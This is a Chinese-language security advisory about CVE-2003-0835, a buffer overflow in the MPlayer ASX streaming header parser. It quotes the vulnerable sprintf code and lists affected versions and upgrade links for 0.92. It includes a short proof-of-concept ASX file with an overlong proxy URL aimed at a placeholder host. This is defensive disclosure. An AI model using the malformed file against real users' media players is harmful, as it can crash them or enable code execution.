安全研究

安全漏洞
MPlayer流ASX头字段解析缓冲区溢出漏洞

发布日期:2003-09-25
更新日期:2003-10-09

受影响系统:
MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.90 rc4
MPlayer MPlayer 0.90 rc series
MPlayer MPlayer 0.90 pre series
MPlayer MPlayer 0.90
MPlayer MPlayer 0.91
    - Mandrake Linux 9.2
不受影响系统:
MPlayer MPlayer 0.92
描述:
BUGTRAQ  ID: 8702
CVE(CAN) ID: CVE-2003-0835

MPlayer是一款基于Linux的电影播放程序。

MPLayer在处理畸形流ASX文件头字段时存在问题,远程攻击者可以利用这个漏洞诱使用户访问畸形ASX文件,触发缓冲区溢出。

问题是asf_streaming.c文件中包含的asf_http_request函数缺少正确的边界缓冲区检查,问题代码如下:

asf_http_request {
        char str[250];
        ....
        ...
        ..
        sprintf( str, "Host: %s:%d", server_url->hostname,
server_url->port );    
        ....
        ...    
        ..
        sprintf( str, "Host: %s:%d", url->hostname, url->port );

        ....
        ...
        ..
}

由于MAXHOSTLEN对主机长度进行了限制,看起来不可利用,但是如果使用包含"badsite" 监听"badport"的ASX文件,可触发缓冲区溢出,精心构建请求ASX文件,并诱使用户解析,可导致以用户进程权限在系统上执行任意指令。

<*来源:Otero, Hernan (hernan.otero@eds.com
  
  链接:http://www.mplayerhq.hu/homepage/design6/news.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Otero, Hernan (hernan.otero@eds.com)提供了如下测试方法:

<asx version = "3.0">
<title>Bas Site ASX</title>

<moreinfo href = "mailto:info badsite com
<mailto:info badsite com> " />
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/
<http://www.badsite.com/> " />
</banner>

<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>? All by the news</COPYRIGHT>
<ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://badsite.com/streaming/grupo.gif> " style="ICON" />
</entry>
</asx>

建议:
厂商补丁:

MPlayer
-------
下载MPlayer 0.92或者最新CVS更新修正了此漏洞:

Hungary 1, HTTP -> http://www1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

Hungary 1, FTP -> ftp://ftp1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

Hungary 2, HTTP -> http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

Hungary 2, FTP -> ftp://ftp2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

USA, HTTP -> http://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

USA, FTP -> ftp://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

Switzerland, HTTP -> http://www4.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

USA2, HTTP -> http://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

USA2, FTP -> ftp://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2

Australia, FTP -> ftp://ftp6.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2

Finland, HTTP -> http://www7.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2

浏览次数:3190
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障